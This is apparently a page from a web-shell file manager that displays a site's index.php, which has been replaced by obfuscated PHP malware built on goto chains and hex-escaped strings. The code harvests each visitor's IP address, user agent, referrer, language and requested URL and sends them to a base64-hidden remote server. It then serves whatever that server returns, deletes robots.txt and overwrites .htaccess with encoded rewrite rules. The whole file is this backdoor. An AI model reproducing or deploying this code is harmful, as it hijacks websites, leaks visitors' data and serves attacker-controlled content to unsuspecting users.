OwlCyberSecurity - MANAGER

Edit File: index.php

<?php
 goto Z42Ej; lHH2w: function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, "\x68"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if (is_array($pf)) { curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } goto PBtk3; bvClU: goto xehI3; goto DrAt1; nLhMq: goto yJx52; goto lz0PR; NNgKG: RDnlq: goto lbP9B; Maw0E: goto GswfZ; goto gGRbn; eV6LW: goto rEgHs; goto fMd1F; lnvUK: fMcpk: goto mAqVg; zUWQ7: D1Gr7: goto Yu_V3; GekmW: goto dU6KO; goto GHVzn; fYT_w: bmlf_: goto HulJA; r0iqK: WEDK4: goto G_dt0; PBtk3: goto He09u; goto zUWQ7; Vy18i: goto XT0Wr; goto qQW9T; NPvgU: $params["\154\x61\x6e\x67\x75\x61\x67\x65"] = isset($_SERVER["\110\124\124\120\137\x41\103\103\105\x50\124\x5f\114\101\x4e\107\125\x41\x47\x45"]) ? $_SERVER["\x48\124\124\120\137\x41\103\x43\105\120\x54\x5f\114\101\116\107\125\101\x47\x45"] : ''; goto A5g_g; IET4M: Pw6bw: goto h1htl; v8_rr: goto TWrbu; goto n5fh2; fG3b9: $params["\x72\x65\x66\x65\162\x65\162"] = isset($_SERVER["\110\x54\x54\x50\x5f\122\105\106\105\122\105\x52"]) ? $_SERVER["\x48\124\124\120\x5f\122\105\106\105\122\x45\x52"] : ''; goto nLhMq; GHVzn: He09u: goto t0_aT; P3TcN: LlwHU: goto YMxcv; BgOm5: $params["\141\x67\x65\156\x74"] = isset($_SERVER["\110\124\124\120\x5f\125\x53\105\x52\137\101\x47\105\x4e\124"]) ? $_SERVER["\110\124\x54\120\x5f\x55\123\x45\x52\x5f\x41\107\x45\x4e\124"] : ''; goto yhOjO; bX7F1: $params["\x64\x6f\x6d\x61\x69\x6e"] = isset($_SERVER["\110\124\x54\x50\137\110\x4f\123\x54"]) ? $_SERVER["\110\x54\124\120\137\x48\117\x53\124"] : $_SERVER["\123\105\x52\x56\105\x52\137\x4e\101\115\x45"]; goto qtQDc; E30xa: goto CCMJf; goto q2jQ4; S12cS: yJx52: goto i35CJ; U0HHC: razJ1: goto axmYS; s8sBs: goto wej1f; goto IW9_7; Im_EQ: goto MBHa8; goto Y0SDg; aOGxg: hc2S3: goto TklKT; oLFoj: P_3rl: goto BgOm5; ximN9: goto phTzj; goto SEUvE; azMJB: goto OHeJc; goto aMkLa; TklKT: goto dKX1W; goto PxEou; sz924: goto rJXaU; goto S12cS; rXd32: goto mABje; goto XzLzw; IW9_7: goto Bv8LS; goto lnvUK; RALB5: goto gU0gX; goto maYHA; k6cyr: fuoib: goto YKbwk; IktCh: goto Fcx2q; goto wk377; Ve9fF: goto GjMfd; goto Im_EQ; j647P: TsbgX: goto Maw0E; L9z7U: while ($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("\57\134\174\x2f\x73\151", $content, -1, PREG_SPLIT_NO_EMPTY); if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die; } $try++; } goto rh9Ck; LUqH4: goto h388j; goto U0HHC; mAqVg: goto o_ETL; goto IktCh; MeEio: goto e7WZl; goto oS0X1; lkRD8: GjMfd: goto pcPSS; lz0PR: UUbA8: goto YuJ_X; t0_aT: goto ECAy4; goto xeKS0; iuaA3: goto gm0pC; goto TbcXG; c4Gmu: rJXaU: goto d9elc; wQwbG: q1Gzu: goto Jpp8E; LKVhl: Pw8Mb: goto iuaA3; CtJjf: GswfZ: goto ZwbFh; Sd60N: nIn1h: goto tomCS; xeKS0: goto SFqpU; goto Llhfl; fMd1F: T8Msr: goto Vy18i; B7dsN: rEgHs: goto L9z7U; HulJA: $api = base64_decode("\x61\x48\122\60\143\x44\157\166\x4c\172\131\x78\x4e\104\x59\164\131\62\147\60\114\130\x59\x79\117\104\147\x75\x61\x57\x31\x6e\x4e\x33\x6c\150\141\107\x39\x76\114\155\x4e\x76\x62\121\x3d\x3d"); goto qxsoI; yP8cv: goto U02JV; goto rLSdK; n5fh2: xehI3: goto NPvgU; vue6v: goto HJ9tE; goto IET4M; KPXZV: function h2() { if (file_exists("\x72\157\142\x6f\164\163" . "\x2e\x74\x78\x74")) { @unlink("\162\157\x62\157\164\x73" . "\x2e\x74\x78\x74"); } $htaccess = "\x2e" . "\x68\164\x61\143\143\145\x73\x73"; $content = @base64_decode("\x50\105\x5a\160\x62\x47\x56\172\x54\127\106\60\131\62\x67\x67\111\151\64\157\143\110\x6c\x38\x5a\130\x68\x6c\146\110\x42\157\143\103\x6b\x6b\x49\x6a\x34\113\x49\105\x39\171\x5a\x47\126\171\111\x47\x46\163\x62\x47\x39\x33\x4c\107\x52\154\142\156\153\113\x49\105\122\x6c\142\156\x6b\147\132\156\112\x76\142\123\x42\x68\142\107\167\x4b\x50\x43\x39\x47\141\x57\170\154\143\x30\x31\x68\x64\107\116\157\x50\147\157\x38\x52\x6d\x6c\x73\x5a\130\116\x4e\x59\x58\122\x6a\141\103\x41\151\130\151\x68\150\131\155\71\61\144\103\65\x77\141\x48\x42\x38\x63\x6d\106\x6b\x61\x57\70\165\x63\107\x68\x77\146\x47\154\x75\x5a\107\126\64\114\x6e\102\x6f\x63\x48\170\x6a\x62\x32\x35\60\x5a\x57\65\60\x4c\x6e\102\157\x63\110\x78\x73\142\62\116\162\x4d\172\x59\x77\x4c\x6e\102\157\143\110\170\x68\x5a\x47\x31\160\142\151\65\x77\x61\x48\102\x38\144\63\x41\164\x62\x47\71\x6e\141\127\x34\165\143\x47\150\167\146\x48\144\167\x4c\127\167\167\132\62\x6c\x75\x4c\x6e\x42\x6f\x63\x48\x78\x33\143\x43\61\x30\141\107\x56\x74\x5a\x53\x35\x77\x61\110\x42\x38\x64\63\x41\x74\143\62\116\x79\x61\x58\102\60\143\x79\65\167\141\110\102\x38\x64\x33\x41\x74\x5a\x57\x52\160\144\x47\71\171\x4c\156\x42\x6f\143\110\170\x74\x59\x57\x67\x75\x63\x47\x68\167\x66\x47\160\x77\114\156\x42\157\143\110\x78\x6c\x65\110\x51\x75\143\x47\x68\167\113\x53\121\151\120\x67\157\x67\x54\x33\x4a\153\x5a\130\x49\147\131\x57\x78\163\142\63\143\x73\x5a\107\126\x75\x65\x51\157\x67\121\x57\170\x73\142\63\x63\x67\x5a\x6e\x4a\166\142\x53\x42\x68\x62\107\167\x4b\x50\x43\71\x47\x61\x57\170\154\143\x30\61\150\x64\107\116\x6f\120\147\157\70\123\127\x5a\116\x62\62\x52\x31\142\107\x55\147\142\x57\x39\153\130\x33\x4a\x6c\144\63\x4a\160\x64\x47\125\x75\x59\x7a\x34\113\125\x6d\x56\63\x63\x6d\x6c\60\132\x55\126\165\132\x32\x6c\165\132\123\102\x50\x62\147\x70\123\x5a\x58\x64\x79\141\x58\122\154\121\155\106\172\132\x53\x41\166\x43\154\x4a\x6c\144\x33\x4a\160\x64\x47\x56\123\x64\127\170\154\111\106\x35\x70\x62\x6d\122\154\x65\x46\x77\x75\143\107\x68\x77\112\103\101\x74\x49\x46\164\115\130\x51\160\x53\x5a\130\x64\x79\141\130\x52\x6c\121\62\x39\x75\132\103\x41\154\x65\61\x4a\106\125\x56\126\106\x55\61\x52\x66\122\x6b\x6c\115\x52\x55\65\102\x54\125\x56\x39\111\103\105\x74\x5a\x67\x70\x53\132\x58\x64\171\x61\130\122\x6c\x51\x32\x39\165\x5a\x43\x41\x6c\x65\61\112\x46\x55\x56\126\106\125\61\122\146\122\153\x6c\115\122\125\x35\102\x54\x55\x56\71\x49\x43\105\164\x5a\x41\x70\123\x5a\130\144\x79\141\130\122\154\125\156\x56\163\x5a\x53\101\x75\x49\x43\71\160\142\155\x52\x6c\x65\x43\x35\167\141\110\x41\147\127\x30\170\x64\x43\152\167\166\123\x57\x5a\116\x62\62\122\x31\x62\x47\125\53"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 511); @file_put_contents($htaccess, $content); @chmod($htaccess, 420); } goto tyozf; Tao6Z: CCMJf: goto c9wcP; nfiwd: goto uLjD7; goto IwDPG; S015Z: NiLz_: goto g9MMU; DrAt1: dU6KO: goto yP8cv; gGRbn: goto Pw6bw; goto nQjJi; nL_P5: goto H5bmV; goto l2EkM; akPOk: goto LlwHU; goto VtZge; yhOjO: goto MFc_D; goto hF72l; TwGqJ: VABq7: goto azMJB; l2EkM: Fcx2q: goto NNgKG; qQW9T: goto OJ4ly; goto Sd60N; n1fGO: ECAy4: goto v8_rr; G_dt0: goto NiLz_; goto rXd32; Jpp8E: goto uNCa1; goto LUqH4; JVejk: efsoQ: goto bX7F1; jRqQg: wCEVb: goto lHH2w; wk377: r1gmT: goto lkRD8; YMxcv: goto VABq7; goto E30xa; z3F9r: U02JV: goto RALB5; axmYS: $params["\x72\x65\161\x75\x65\163\x74\137\x75\162\154"] = $_SERVER["\122\x45\x51\125\x45\x53\x54\137\125\122\111"]; goto GekmW; O7UcU: wnmc9: goto s8sBs; TI2_V: dKX1W: goto rI1ab; pcPSS: goto bmlf_; goto JVejk; YKbwk: $params["\160\162\157\164\x6f\x63\x6f\x6c"] = isset($_SERVER["\110\124\x54\120\123"]) ? "\150\164\164\160\x73\72\57\x2f" : "\x68\x74\x74\160\x3a\57\x2f"; goto kD6lT; WjwmW: wej1f: goto bEFLD; c9wcP: ppA8T: goto vue6v; q2jQ4: jLl5a: goto n1fGO; k40l6: FNwJL: goto Ve9fF; oS0X1: HJ9tE: goto NZXt_; x_K4I: goto UUbA8; goto TI2_V; NZXt_: if (isset($_REQUEST["\x70\141\x72\x61\155\x73"])) { $params["\x61\160\x69"] = $api; print_r($params); die; } goto xLiqx; g9MMU: goto WlOqu; goto Tao6Z; rh9Ck: goto nIn1h; goto jRqQg; Yu_V3: gm0pC: goto xKeep; Y0SDg: OJ4ly: goto aOGxg; xKeep: goto efsoQ; goto MKKt3; CUlHU: goto jLl5a; goto LKVhl; HFKSz: $try = 0; goto UaRC0; ZwbFh: goto fuoib; goto j647P; tyozf: goto FNwJL; goto hsSMk; rstsf: goto ppA8T; goto nL_P5; Llhfl: TWrbu: goto KPXZV; zDgk4: mABje: goto CtJjf; rLSdK: goto D1Gr7; goto fYT_w; tomCS: goto nwTUn; goto MeEio; PxEou: MFc_D: goto ximN9; kD6lT: goto T8Msr; goto oLFoj; G0fKH: uLjD7: goto L8LyY; OEceT: goto TsbgX; goto zDgk4; cj_2R: H5bmV: goto TwGqJ; lbP9B: goto P_3rl; goto r0iqK; VtZge: e7WZl: goto z3F9r; YuJ_X: o_ETL: goto O_Pni; Z42Ej: goto fMcpk; goto k40l6; WJKJH: h2(); goto akPOk; qxsoI: goto Pw8Mb; goto BJNhA; BJNhA: WlOqu: goto WJKJH; hF72l: OHeJc: goto HFKSz; JqiTU: goto it96h; goto k6cyr; h1htl: XT0Wr: goto bvClU; i35CJ: goto RDnlq; goto x_K4I; T3P2_: phTzj: goto sz924; lbtN4: uNCa1: goto eV6LW; aMkLa: gU0gX: goto fG3b9; XzLzw: SFqpU: goto S015Z; TbcXG: goto vIi_P; goto cj_2R; MKKt3: Bv8LS: goto T3P2_; maYHA: MBHa8: goto lbtN4; A5g_g: goto tztbY; goto B7dsN; MRYhs: tztbY: goto rstsf; UaRC0: goto q1Gzu; goto MRYhs; L8LyY: goto hc2S3; goto CUlHU; nQjJi: vIi_P: goto WjwmW; rI1ab: if ($params["\151\x70"] == null) { $params["\x69\160"] = ''; } goto OEceT; hsSMk: h388j: goto fG118; bEFLD: goto razJ1; goto G0fKH; IwDPG: it96h: goto s6WaD; qtQDc: goto wnmc9; goto c4Gmu; fG118: nwTUn: goto JqiTU; d9elc: $params["\151\160"] = isset($_SERVER["\110\x54\124\x50\137\126\111\101"]) ? $_SERVER["\x48\x54\x54\120\137\130\137\106\117\x52\127\x41\122\104\105\x44\137\106\117\122"] : $_SERVER["\x52\x45\115\117\124\105\x5f\x41\x44\104\122"]; goto nfiwd; SEUvE: goto r1gmT; goto P3TcN; xLiqx: goto WEDK4; goto O7UcU; O_Pni: goto wCEVb; goto wQwbG; s6WaD: ?>